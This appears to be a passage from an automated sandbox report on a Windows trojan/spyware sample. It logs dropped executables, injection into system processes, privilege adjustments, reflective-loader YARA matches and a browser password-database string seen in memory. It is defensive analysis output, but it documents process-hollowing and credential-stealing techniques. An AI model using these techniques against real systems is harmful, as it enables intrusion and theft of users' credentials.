                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe, Code function: 11_2_00007FF7DBD52048 GetModuleFileNameW, CreateProcessW, CreateFileW, GetFileSize, CloseHandle, VirtualAlloc, CloseHandle, ReadFile, VirtualFree, CloseHandle, CloseHandle, GetThreadContext, VirtualFree, ReadProcessMemory, GetModuleHandleA, GetProcAddress, NtUnmapViewOfSection, VirtualFree, VirtualAllocEx, VirtualFree, WriteProcessMemory, VirtualFree, WriteProcessMemory, VirtualFree, RtlCompareMemory, ReadProcessMemory, WriteProcessMemory, VirtualFree, WriteProcessMemory, SetThreadContext, VirtualFree, ResumeThread, VirtualFree, VirtualFree
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F4572821_2_00007FF641F45728
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F31F3021_2_00007FF641F31F30
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F3FBD821_2_00007FF641F3FBD8
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8372A6821_2_00007FF8B8372A68
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B831DAC021_2_00007FF8B831DAC0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8305B5C21_2_00007FF8B8305B5C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B830FBE021_2_00007FF8B830FBE0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8372C4821_2_00007FF8B8372C48
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8367BFC21_2_00007FF8B8367BFC
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B83A5E6421_2_00007FF8B83A5E64
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B83A8DF821_2_00007FF8B83A8DF8
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8330E1521_2_00007FF8B8330E15
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B830FF6021_2_00007FF8B830FF60
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8302FA021_2_00007FF8B8302FA0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B832F00021_2_00007FF8B832F000
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B830D03021_2_00007FF8B830D030
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B83900BC21_2_00007FF8B83900BC
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B831D12021_2_00007FF8B831D120
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B830327421_2_00007FF8B8303274
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B832120021_2_00007FF8B8321200
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B83262D021_2_00007FF8B83262D0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B830C36021_2_00007FF8B830C360
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B831030021_2_00007FF8B8310300
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B830831021_2_00007FF8B8308310
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B830233C21_2_00007FF8B830233C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B832238421_2_00007FF8B8322384
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B832C42921_2_00007FF8B832C429
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B830F52021_2_00007FF8B830F520
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B831F5A421_2_00007FF8B831F5A4
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B83116D021_2_00007FF8B83116D0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B834274021_2_00007FF8B8342740
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B83026F821_2_00007FF8B83026F8
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B830885421_2_00007FF8B8308854
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B83128B021_2_00007FF8B83128B0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB63CF021_2_00007FF8BFB63CF0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB637B021_2_00007FF8BFB637B0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB61A8021_2_00007FF8BFB61A80
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB6521C21_2_00007FF8BFB6521C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB6263021_2_00007FF8BFB62630
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB61A8021_2_00007FF8BFB61A80
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB6314021_2_00007FF8BFB63140
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB62D3021_2_00007FF8BFB62D30
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB76AE421_2_00007FF8BFB76AE4
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB72DD021_2_00007FF8BFB72DD0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB971CC21_2_00007FF8BFB971CC
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB9D13021_2_00007FF8BFB9D130
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe 94D7D12AE53CE97F38D8890383C2317CE03D45BD6ECAF0E0B9165C7066CD300C
                  Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF7E52B1050 appears 106 times
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCode function: String function: 00007FF7DBD51050 appears 106 times
                  Source: C:\Windows\System32\msiexec.exeCode function: String function: 00007FF775AE1050 appears 106 times
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: String function: 00007FF641F225F0 appears 100 times
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: String function: 00007FF641F22760 appears 36 times
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: String function: 00007FF794831050 appears 106 times
                  Source: C:\Windows\System32\audiodg.exeCode function: String function: 00007FF7A91B1050 appears 106 times
                  Source: api-ms-win-crt-conio-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-interlocked-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-time-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-console-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-util-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-math-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-localization-l1-2-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-string-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l2-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-environment-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-locale-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-convert-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-heap-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-processthreads-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-rtlsupport-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-debug-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-libraryloader-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l1-2-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-errorhandling-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-processthreads-l1-1-1.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-profile-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-heap-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-namedpipe-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-stdio-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-filesystem-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-handle-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-synch-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-sysinfo-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-synch-l1-2-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-utility-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-string-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-timezone-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-processenvironment-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-datetime-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-memory-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-runtime-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-process-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: K6qneGSDSB.exe, 00000000.00000000.2043068807.00007FF79CD79000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs K6qneGSDSB.exe
                  Source: K6qneGSDSB.exe, 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs K6qneGSDSB.exe
                  Source: K6qneGSDSB.exeBinary or memory string: OriginalFilenameServices.exe2 vs K6qneGSDSB.exe
                  Source: 7.3.explorer.exe.ca53600.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.2.explorer.exe.e8b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.2.explorer.exe.8b70000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.2.explorer.exe.ca53600.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.3.explorer.exe.ca53600.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 6.2.svchost.exe.251e2e7d000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.2.explorer.exe.8b70000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.3.explorer.exe.ca53600.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.3.explorer.exe.ca53600.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.0.explorer.exe.8b70000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.3.explorer.exe.ca53600.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.2.explorer.exe.e8b0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.2.explorer.exe.ca53600.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.3.explorer.exe.ca53600.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.3.explorer.exe.ca53600.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.3.explorer.exe.ca53600.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.3.explorer.exe.ca53600.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.3.explorer.exe.ca53600.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.0.explorer.exe.8b70000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 6.2.svchost.exe.251e2e7d000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 00000007.00000000.2060880149.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 00000006.00000002.3291804673.00000251E2E7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@36/60@0/1
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F229E0 GetLastError,FormatMessageW,MessageBoxW,20_2_00007FF641F229E0
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF794834264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,1_2_00007FF794834264
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF7948340E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,1_2_00007FF7948340E4
                  Source: C:\Windows\System32\svchost.exeCode function: 6_2_00007FF7E52B4264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,6_2_00007FF7E52B4264
                  Source: C:\Windows\System32\svchost.exeCode function: 6_2_00007FF7E52B40E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,6_2_00007FF7E52B40E4
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B3270 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,7_2_0E8B3270
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCode function: 11_2_00007FF7DBD54264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,11_2_00007FF7DBD54264
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCode function: 11_2_00007FF7DBD540E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,11_2_00007FF7DBD540E4
                  Source: C:\Windows\System32\audiodg.exeCode function: 13_2_00007FF7A91B4264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,13_2_00007FF7A91B4264
                  Source: C:\Windows\System32\audiodg.exeCode function: 13_2_00007FF7A91B40E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,13_2_00007FF7A91B40E4
                  Source: C:\Windows\System32\msiexec.exeCode function: 14_2_00007FF775AE4264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,14_2_00007FF775AE4264
                  Source: C:\Windows\System32\msiexec.exeCode function: 14_2_00007FF775AE40E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,14_2_00007FF775AE40E4
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF794834004 CreateToolhelp32Snapshot,Process32FirstW,wcscmp,Process32NextW,CloseHandle,1_2_00007FF794834004
                  Source: C:\Users\user\Desktop\Grabber.exeCode function: 2_2_004026B8 LoadResource,SizeofResource,FreeResource,2_2_004026B8
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exe File created: C:\Users\user\AppData\Roaming\systemsx.exe
                  Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\worker_RdDwvE
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeMutant created: NULL
                  Source: C:\Windows\System32\audiodg.exeMutant created: \Sessions\1\BaseNamedObjects\worker_kBEqZh
                  Source: C:\Windows\System32\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\worker_BAccdq
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
                  Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\GqgWzd
                  Source: C:\Users\user\Desktop\Grabber.exe File created: C:\Users\user\AppData\Local\Temp\B334.tmp
                  Source: C:\Users\user\Desktop\Grabber.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmp\B336.bat C:\Users\user\Desktop\Grabber.exe"
                  Source: K6qneGSDSB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                  Source: C:\Users\user\Desktop\Grabber.exe File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000036AD000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003604000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003697000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003587000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003571000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000361A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: K6qneGSDSB.exeReversingLabs: Detection: 60%
                  Source: unknownProcess created: C:\Users\user\Desktop\K6qneGSDSB.exe "C:\Users\user\Desktop\K6qneGSDSB.exe"
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeProcess created: C:\Users\user\AppData\Roaming\systemsx.exe "C:\Users\user\AppData\Roaming\systemsx.exe"
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeProcess created: C:\Users\user\Desktop\Grabber.exe "Grabber.exe"
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                  Source: C:\Users\user\Desktop\Grabber.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmp\B336.bat C:\Users\user\Desktop\Grabber.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe "C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe"
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe "C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe "C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe"
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeProcess created: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe"
                  Source: C:\Users\user\Desktop\Grabber.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                  Source: C:\Windows\System32\cmd.exe Automated click: OK
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: K6qneGSDSB.exe Static PE information: Image base 0x140000000 > 0x60000000
                  Source: K6qneGSDSB.exe Static file information: File size 2672128 > 1048576
                  Source: K6qneGSDSB.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x234400
                  Source: K6qneGSDSB.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: K6qneGSDSB.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: K6qneGSDSB.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: K6qneGSDSB.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: K6qneGSDSB.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: K6qneGSDSB.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: K6qneGSDSB.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: K6qneGSDSB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: K6qneGSDSB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: K6qneGSDSB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: K6qneGSDSB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: K6qneGSDSB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  Source: C:\Users\user\Desktop\Grabber.exeUnpacked PE file: 2.2.Grabber.exe.400000.0.unpack
                  Source: Yara matchFile source: 2.0.Grabber.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.K6qneGSDSB.exe.7ff79cdc4c80.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.K6qneGSDSB.exe.7ff79cdc4c80.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Grabber.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: C:\Users\user\Desktop\Grabber.exe, type: DROPPED
                  Source: DB9C.tmp.ssg.exe.7.drStatic PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
